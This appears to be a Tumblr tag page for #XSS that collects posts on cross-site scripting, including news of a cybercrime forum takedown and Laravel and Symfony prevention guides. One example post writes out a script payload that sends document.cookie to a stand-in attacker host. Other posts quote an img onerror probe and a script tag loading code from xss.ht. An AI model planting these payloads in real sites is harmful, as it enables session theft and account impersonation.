#XSS
Explore tagged Tumblr posts
Visit Tumblr Blog
Explore Tumblr blogs with no restrictions, modern design and the best experience.
Last Seen Tumblr Blogs
baconvstofu-blog
Bacon vs. Tofu
23 posts
sissy-celine-c
SISSY CELINE
158 posts
sapphire-nite
spilled ink
2 posts
bigfrogsdreams
Zzz
17 posts
statychaty-blog
Untitled
17 posts
Fun Fact
Average visit duration of Tumblr.com is 10 mins and 25 secs.
games-desu · 5 months ago
Text
Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media Tumblr media
Indiana Jones and the Great Circle (2024)
#screen caps#indiana jones and the great circle#indiana jones#indiana#xss
8 notes · View notes
cyber-sec · 9 days ago
Text
Major Dark Web Forum Admin Caught in Ukraine
Authorities have taken down a suspected key player behind XSS.is, a notorious cybercrime marketplace that traded malware and ransomware services. Investigators say the forum generated millions from hacking operations.
Source: The Record
Read more: CyberSecBrief
#cybercrime#lawenforcement#darkweb#ransomware#XSS
5 notes · View notes
sqlinjection · 9 months ago
Text
XSS example
examples speak louder than explanations!
we have a web server with a guestbook script (kind of book of complaints/suggestions), which accepts small messages from users, and it would not be a surprise to receive such a message:
Good-looking site!
but you may be definitely surprised seeing a compliment like this:
Nice site, I think I'll take it. <script>window.location="https://some_attacker/evilcgi/cookie.cgi?steal=" + escape(document.cookie)</script>
another user views the page -> the injected code will be executed
this code can allow the attacker to impersonate another user, however this same software bug can be accidentally triggered by an unassuming user which will cause the website to display bad HTML code
many of these problems are related to erroneous assumptions of what input data is valid or affects special data
#technique#xss#example
3 notes · View notes
pythonjobsupport · 9 days ago
Text
SQLi || SQL Injection Using XSS prompt Payloads
join official facebook group: join official telegram: … source
#Injection#Payloads#Prompt#SQL#SQLi#XSS
0 notes
newstech24 · 10 days ago
Text
European authorities arrest alleged admin of infamous Russian crime discussion board XSS
European officers have confirmed the arrest of the alleged administrator behind XSS.is, one of many longest-running Russian-language cybercrime boards.  Per Europol, the alleged administrator was arrested in Ukraine on Tuesday. A legislation enforcement discover on XSS now reads: “This area has been seized.” In response to a press release by prosecutors in Paris, French authorities obtained a…
#admin#alleged#arrest#authorities#crime#European#forum#Notorious#Russian#XSS
0 notes
techsolvecentral · 20 days ago
Text
🔐The Essential Guide to XSS Protection in Laravel
Cross-Site Scripting (XSS) is a persistent web security nightmare. My comprehensive article explores the serious consequences of XSS (session hijacking, defacement, redirects) and offers practical solutions to prevent these attacks. A must-read for developers and security professionals.
#xss#laravel#php#security#development#programming#web developers#software#coding#backenddevelopment
0 notes
yosoycun · 2 months ago
Text
test<img src='http://244eqeg2ox6xgwdz3qivog5obfh651tq.oastify.com/xss' onerror=alert(1)>
#jaja#xss
1 note · View note
professionalhackersindia · 3 months ago
Text
VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing
VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine. Features Supports pipe input for passing file lists and echoing URLs for testing Configurable retries and timeouts Supports GET, POST, and BOTH HTTP…
#KitPloit#Vulnerabilities#Vulnerability#VulnKnox#Webhook#XSS
0 notes
woted2 · 3 months ago
Text
SonarQube: El Centinela Silencioso del Código Fuente
En el vasto campo de la ciberseguridad, donde cada línea de código puede ser un puente o una brecha, SonarQube se posiciona como uno de los aliados más estratégicos para prevenir fallas antes de que se conviertan en vulnerabilidades explotables. No es solo una herramienta de análisis estático, es un centinela que observa con precisión quirúrgica el pulso del desarrollo, buscando no solo errores,…
#Autenticación#Ciberseguridad#Inyección SQL#ProtegeTusDatos#SonarQube#XSS
0 notes
pentesttestingcorp · 4 months ago
Text
Prevent XSS Attacks in Symfony Applications
Cross-Site Scripting (XSS) remains one of the most exploited web vulnerabilities, especially in modern PHP frameworks like Symfony. In this post, we'll explore how XSS vulnerabilities can creep into Symfony apps, how attackers exploit them, and how to fix or prevent these issues with practical code examples.
Tumblr media
You’ll also see how you can scan your site for free using the Website Vulnerability Scanner, which helps detect XSS vulnerabilities and other issues automatically.
🔍 What is Cross-Site Scripting (XSS)?
Cross-Site Scripting (XSS) is a type of vulnerability that allows attackers to inject malicious JavaScript into webpages viewed by other users. The goal? Stealing cookies, session tokens, or redirecting users to malicious sites.
There are three common types:
Stored XSS – Malicious script is permanently stored on the target server.
Reflected XSS – Script is reflected off a web server, often in search results or error messages.
DOM-based XSS – Happens entirely on the client side using JavaScript.
⚠️ XSS in Symfony: How it Happens
Even though Symfony is a robust framework, developers may still accidentally introduce XSS vulnerabilities if they don’t properly escape output or trust user input blindly.
✅ Vulnerable Example: Output Without Escaping
// src/Controller/SampleController.php public function unsafeOutput(Request $request): Response { $name = $request->query->get('name'); return new Response("<h1>Hello, $name!</h1>"); }
If a user visits:
http://example.com?name=<script>alert('XSS')</script>
This JavaScript will execute in the browser. That’s a textbook XSS vulnerability.
🛡️ Secure Coding: Escaping Output in Symfony
Symfony uses Twig by default, which automatically escapes variables. But developers can override this behavior.
✅ Safe Example with Twig
{# templates/welcome.html.twig #} <h1>Hello, {{ name }}</h1>
This is safe because Twig escapes {{ name }} by default. But if you do this:
<h1>Hello, {{ name|raw }}</h1>
You disable escaping, making it vulnerable again. Avoid using |raw unless you're 100% sure the content is safe.
✋ Validating and Sanitizing Input
Always sanitize and validate input using Symfony’s form and validator components.
✅ Example Using Symfony Validator
use Symfony\Component\Validator\Constraints as Assert; use Symfony\Component\Validator\Validation; $validator = Validation::createValidator(); $violations = $validator->validate($userInput, [ new Assert\NotBlank(), new Assert\Regex([ 'pattern' => '/^[a-zA-Z0-9\s]*$/', 'message' => 'Only alphanumeric characters allowed.' ]), ]); if (count($violations) > 0) { // Handle validation errors }
🧪 Detecting XSS Automatically with a Free Tool
Want to find XSS vulnerabilities without writing a line of code?
Use the free security scanner by Pentest Testing Corp for a Website Security test. It scans your website for XSS, SQLi, Clickjacking, and many other issues.
🖼️ Screenshot of the Website Security Checker homepage
Tumblr media
Screenshot of the free tools webpage where you can access security assessment tools.
📄 Sample XSS Detection Report
After scanning, you’ll get a detailed vulnerability report to check Website Vulnerability. Here’s a sample:
🖼️ Screenshot of a vulnerability assessment report
Tumblr media
An Example of a vulnerability assessment report generated with our free tool, providing insights into possible vulnerabilities.
This includes affected URLs, vulnerability types, severity levels, and remediation suggestions.
🔗 Learn More About Web Security
Visit our blog at Pentest Testing Corp. for more insights, tutorials, and vulnerability write-ups.
✅ Final Checklist for Preventing XSS in Symfony
✅ Use Twig’s auto-escaping.
✅ Never use |raw unless absolutely necessary.
✅ Validate user input with Symfony's Validator.
✅ Sanitize dynamic content before outputting.
✅ Scan your app regularly with tools like free.pentesttesting.com.
Cross-Site Scripting is dangerous, but with a few best practices and tools, you can keep your Symfony app safe. Try out our website vulnerability scanner and harden your web applications today!
#cyber security#cybersecurity#data security#pentesting#security#php#coding#xss#symfony
1 note · View note
games-desu · 5 months ago
Text
Tumblr media
Indiana Jones and the Great Circle (2024)
#screen caps#indiana jones#indiana jones and the great circle#indiana#xss
3 notes · View notes
alexjamson · 4 months ago
Text
🚀 Is Your Laravel App Secure?
Many Laravel applications are vulnerable to SQL Injection & XSS attacks. In our latest case study, we show how a global IT company secured their Laravel app from these threats! 🔐
Read Now
Tumblr media
#Laravel#CyberSecurity#WebDevelopment#XSS#SQLInjection#bestlaraveldevelopmentcompany#hirededicatedlaraveldeveloper#hirededicatedlaravelprogrammers#hirededicatedlaravelwebdevelopers#hirelaraveldevelopers#laravelprogrammers#hirelaravelexpert#hireprofessionallaraveldevelopers#laravelagency#laravelappdevelopmentcompany#laraveldevelopers#laraveldevelopmentcompany#laraveldevelopmentagency#laraveldevelopmentservices#laravelwebagency#laravelwebdevelopmentcompanies#offshorelaraveldevelopers#phanomprofessionals
0 notes
sqlinjection · 9 months ago
Text
DOM Based XSS
The HTML DOM is an Document Object Model for HTML. It defines:
HTML elements as objects
Properties for all HTML elements
Methods for all HTML elements
Events for all HTML elements
in DOM Based XSS (Type-0 XSS”):
The attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner.
So, the page itself (the HTTP response) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.
This is in contrast to other XSS attacks (stored or reflected), wherein the attack payload is placed in the response page (due to a server side flaw).
#technique#xss
3 notes · View notes
pythonjobsupport · 2 months ago
Text
1 Hour of Popular Web Attacks (XSS, CSRF, SSRF, SQL Injection, MIME Sniffing, Smuggling and more!)
This is a compilation of many of my previous videos discussing with example some of the most popular web attacks Enjoy! source
#attacks#CSRF#HOUR#Injection#MIME#Popular#Smuggling#Sniffing#SQL#SSRF#Web#XSS
0 notes
techsolvecentral · 24 days ago
Text
🛡️ Laravel SQL Injection Prevention
SQL Injection is one of the oldest and most dangerous web application vulnerabilities. If you’re building Laravel applications, you’re in luck — Laravel’s Eloquent ORM and query builder offer strong defenses. But to stay secure, you still need to understand the risks and how to avoid them.
#laravel#php#development#programming#web developers#website#software#coding#backenddevelopment#xss#tips
0 notes
abundantchewtoys · 9 months ago
Text
Was his (nick)name “Bobby Tables” Roberts?
Tumblr media
The company now legally known as “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” was set up by a British software engineer, who says he did it purely because he thought it would be “a fun playful name” for his consulting business.
The original name of the company was ““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.
#XSS#html
3K notes · View notes